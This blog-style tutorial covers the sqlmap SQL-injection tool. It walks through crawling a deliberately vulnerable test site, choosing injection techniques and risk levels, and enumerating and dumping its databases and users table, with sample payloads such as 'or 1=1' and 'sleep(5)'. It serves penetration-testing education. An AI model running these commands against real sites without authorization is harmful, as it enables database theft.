Published on

SQLmap in Depth Tutorial

Today we will work with most popular sql injection scanning tool and go in depth with sqlmap advanced guide.

What is SQLmap ?

SQLmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL Injection flaws and taking over database servers.

sqlmap is a modular framework written in Python. It can detect most of the SQL injection flaws across the different platforms. The following databases are supported: ySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.

After exploitation is successful, it can enumerate databases and tables and also can dump database and tables.

Basic flow of SQLMap is as follows

  • Enumerate database information such as name, version, other details.
  • Select particular database to enumerate tables.
  • Select tables and enumerate columns,
  • Select columns and enumerate rows to extract data.
  • Further exploitation if required.

Check SQLMap is installed or not

In this article, we're going to attack a test website and I'll guide you through it.

let's say we’re going to hack this vulnerable site you can get the information about the switches present in sqlmap using the following command.

sqlmap --help

Command Output

sqlmap-help

if sqlmap is not install you get this message so please install sqlmap on your machine.

Command 'sqlmap' not found, but can be installed with:

sudo apt install sqlmap

Step 1 - Identifying the vulnerable url

first of all we need to check whether is vulnerable to SQL attack or not.

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch
  • --crawl : how deep you want to crawl a site
Crawl
	Dept 1: http://www.example.com/news
	Dept 2:	http://www.example.com/news/newest/
	Dept 3: http://www.example.com/news/newest/terror/
	Dept 4: http://www.example.com/news/newest/terror/country/

example --crawl 3
  • --batch : non interactive mode, usually SQLMap will ask you questions, this accepts the default answers

Command Output

sqlmap-identify-vulnerable-url
sqlmap-identify-vulnerable-url

Step 1:1 - Identifying the vulnerable url with --technique option

sqlmap is able to detect and exploit five different SQL injection types:

  • Boolean-based blind (B) : sqlmap replaces or appends to the affected parameter in the HTTP request, a syntatically valid SQL statement string containing a SELECT sub-statement, or any other SQL statement whose the user want to retrieve the output.
Example
http://testphp.vulnweb.com/artists.php?artist=1 or 1=1
  • Time-based blind (T) : sqlmap replaces or appends to the affected parameter in the HTTP request, a syntatically valid SQL statement string containing a query which put on hold the back-end DBMS to return for a certain number of seconds.
Example
http://testphp.vulnweb.com/artists.php?artist=1 or sleep(5)
  • UNION query-based (U) : sqlmap appends to the affected parameter a syntactically valid SQL statement starting with an UNION ALL SELECT.
Example
http://testphp.vulnweb.com/artists.php?artist=1 UNION ALL SELECT
  • Stacked queries (S) : sqlmap tests if the web application supports stacked queries and then, in case it does support, it appends to the affected parameter in the HTTP request, a semi-colon (;) followed by the SQL statement to be executed.

In this article we test only Union query-based technique with sqlmap

sqlmap -u http://testphp.vulnweb.com --crawl 3 --technique="U" --batch

Command Output

sqlmap-identify-vulnerable-url-with-union-technique

Step 1:2 - Identifying the vulnerable url with --threads option

If you work on a big website then you can user --threads option. Default thread in sqlmap is 1 you can use up to 10. its work to fast.

normally --threads option define max number of concurrent HTTP(s) request.

sqlmap -u http://testphp.vulnweb.com --crawl 3 --threads 5 --batch

Step 1:3 - Identifying the vulnerable url with --risk option

some time vulnerability don’t found you can use --risk option. It allows the type of payloads used by the tool. By default, it uses value 1 and can be configured up to level 3. Level 3, being the maximum, includes some heavy SQL queries. The level defines the number of checks/payload to be performed.

sqlmap -u http://testphp.vulnweb.com --crawl 3 --risk 2 --batch

Step 1:4 - Identifying the vulnerable url with --level option

By default sqlmap will test all GET and POST parameters specified, however in some cases you might want to test additional entry points such as HTTP headers. It is possible to specify it with specific options, but the most straight forward technique is to use the --level option.

There is 5 levels available in sqlmap (default is 1):

  • --level 1 : test all GET and POST parameters.
  • --level 2 : test HTTP Cookie in HTTP header.
  • --level 3 : test HTTP User-Agent/Referrer in HTTP header.
  • --level 5 : test HTTP Host in HTTP header.

Note : level 4 no details

sqlmap -u http://testphp.vulnweb.com --crawl 3 --level 1 --batch

Step 1:5 - Identifying the vulnerable url with -v option

This option can be used to set the verbosity level of output messages. There exist seven levels of verbosity. The default level is 1 in which information, warning, error, critical messages and Python tracebacks (if any occur) are displayed.

  • O : Show only Python tracebacks, error and critical messages.
  • 1 : Show also information and warning messages.
  • 2 : Show also debug messages.
  • 3 : Show also payloads injected.
  • 4 : Show also HTTP requests.
  • 5 : Show also HTTP responses' headers.
  • 6 : Show also HTTP responses' page content.
sqlmap -u http://testphp.vulnweb.com --crawl 3 -v 4 --batch

Command Output

sqlmap-identify-vulnerable-url-with-verbosity

Step 2 - Enumerate and Exploit vulnerable url

Find current user of DATABASE

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-user

Command Output

sqlmap-enumerate-current-user

Find current DATABASE name

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-db

Command Output

sqlmap-enumerate-current-database

Find current HOST of DATABASE

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --hostname

Command Output

sqlmap-enumerate-current-host

Fetch All databases

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

Command Output

sqlmap-enumerate-all-database

Fetch All tables From specific database

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

Command Output

sqlmap-enumerate-database-tables

Fetch All columns From specific table

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

Command Output

sqlmap-enumerate-table-column

Fetch All data From specific table

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --dump --batch

Command Output

sqlmap-enumerate-table-data

Fetch All data From all available tables

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --dump-all

Step 3 - Save your data and create a report

sqlmap -u http://testphp.vulnweb.com --crawl 3 --output-dir="/home/kali/temp/" --batch
sqlmap-save-report
Discuss on TwitterView on GitHub